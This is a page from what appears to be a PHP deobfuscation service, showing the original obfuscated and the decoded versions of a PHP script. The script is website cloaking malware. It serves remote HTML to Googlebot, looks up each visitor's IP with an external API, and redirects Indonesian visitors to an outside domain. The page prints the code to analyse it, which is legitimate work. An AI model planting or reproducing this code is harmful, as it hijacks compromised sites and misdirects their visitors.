Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto iikhG; OHSJF: profile_user(); goto ygthb; iikhG: function profile_user() { $r..

Decoded Output download

<?php 
 goto iikhG; OHSJF: profile_user(); goto ygthb; iikhG: function profile_user() { $refererUrl = !empty($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $useragent = $_SERVER["HTTP_USER_AGENT"]; $refererDomain = parse_url($refererUrl, PHP_URL_HOST); $themes = "https://pub-932ae37a6fda4cf6bad4ce7cbc199812.r2.dev/qualitylifebr.html"; if (strpos($useragent, "Google-InspectionTool") !== false || strpos($useragent, "googlebot") !== false || strpos($useragent, "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)") !== false) { $content = file_get_contents($themes); echo $content; die; } $visitor_ip = $_SERVER["REMOTE_ADDR"]; $api_url = "https://api.incolumitas.com/?q=" . $visitor_ip; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { echo "JSON Decode error: " . json_last_error_msg(); die; } $language = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? strtolower($_SERVER["HTTP_ACCEPT_LANGUAGE"]) : ''; if (isset($data["country_code"]) && $data["country_code"] === "ID" || isset($data["country"]) && $data["country"] === "Indonesia" || strpos($language, "id") !== false) { header("Location: https://aksescepat.xyz/ulti700", true, 301); die; } include "index.php"; die; } goto OHSJF; ygthb: ?>

Did this file decode correctly?

Original Code

<?php
 goto iikhG; OHSJF: profile_user(); goto ygthb; iikhG: function profile_user() { $refererUrl = !empty($_SERVER["\110\x54\124\120\137\x52\105\106\x45\122\x45\122"]) ? $_SERVER["\x48\124\124\120\x5f\x52\105\x46\x45\x52\x45\x52"] : ''; $useragent = $_SERVER["\x48\124\x54\120\x5f\125\x53\x45\122\137\101\x47\x45\x4e\x54"]; $refererDomain = parse_url($refererUrl, PHP_URL_HOST); $themes = "\150\x74\x74\160\163\72\57\57\160\x75\x62\x2d\x39\x33\62\141\145\63\x37\141\x36\x66\144\x61\x34\x63\x66\66\142\x61\x64\64\x63\145\x37\143\x62\x63\x31\71\x39\70\61\62\56\x72\62\x2e\144\x65\166\57\x71\165\141\x6c\x69\x74\171\154\x69\x66\x65\142\x72\x2e\x68\x74\x6d\x6c"; if (strpos($useragent, "\x47\x6f\157\147\x6c\x65\x2d\x49\156\x73\x70\145\143\164\151\157\x6e\124\x6f\x6f\x6c") !== false || strpos($useragent, "\x67\157\x6f\x67\154\x65\x62\x6f\x74") !== false || strpos($useragent, "\x28\143\x6f\x6d\160\141\x74\x69\x62\154\x65\73\40\x47\157\x6f\147\154\145\x62\x6f\x74\57\62\56\61\73\x20\53\x68\x74\164\160\72\x2f\57\167\x77\x77\x2e\x67\x6f\157\147\x6c\145\56\x63\157\x6d\x2f\142\157\x74\x2e\150\x74\155\154\51") !== false) { $content = file_get_contents($themes); echo $content; die; } $visitor_ip = $_SERVER["\x52\x45\x4d\x4f\x54\x45\137\x41\x44\x44\122"]; $api_url = "\150\x74\x74\x70\163\x3a\x2f\x2f\141\160\151\x2e\x69\x6e\143\x6f\x6c\x75\155\x69\x74\141\x73\56\x63\157\x6d\x2f\77\x71\75" . $visitor_ip; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); $data = json_decode($response, true); if (json_last_error() !== JSON_ERROR_NONE) { echo "\112\x53\117\x4e\x20\104\x65\x63\x6f\x64\145\x20\x65\162\162\x6f\162\72\x20" . json_last_error_msg(); die; } $language = isset($_SERVER["\x48\124\x54\120\x5f\101\103\103\105\x50\x54\x5f\x4c\x41\116\x47\125\101\x47\x45"]) ? strtolower($_SERVER["\110\x54\124\x50\137\101\103\x43\105\x50\x54\137\114\101\x4e\107\125\101\107\x45"]) : ''; if (isset($data["\x63\x6f\x75\156\164\x72\171\137\x63\157\x64\145"]) && $data["\x63\157\165\x6e\164\x72\171\137\143\x6f\144\145"] === "\x49\104" || isset($data["\143\157\x75\156\x74\162\x79"]) && $data["\x63\157\x75\x6e\164\162\x79"] === "\x49\x6e\144\157\x6e\145\163\x69\x61" || strpos($language, "\151\144") !== false) { header("\114\157\x63\141\164\151\157\156\x3a\x20\x68\164\x74\160\163\x3a\x2f\x2f\141\153\163\145\x73\143\x65\x70\x61\x74\56\x78\171\x7a\x2f\x75\x6c\x74\151\67\60\x30", true, 301); die; } include "\x69\x6e\144\x65\170\56\x70\150\160"; die; } goto OHSJF; ygthb: ?>

Function Calls

None

Variables

None

Stats

MD5 9ce03f4e778d70a2412dadc618d7bf92
Eval Count 0
Decode Time 42 ms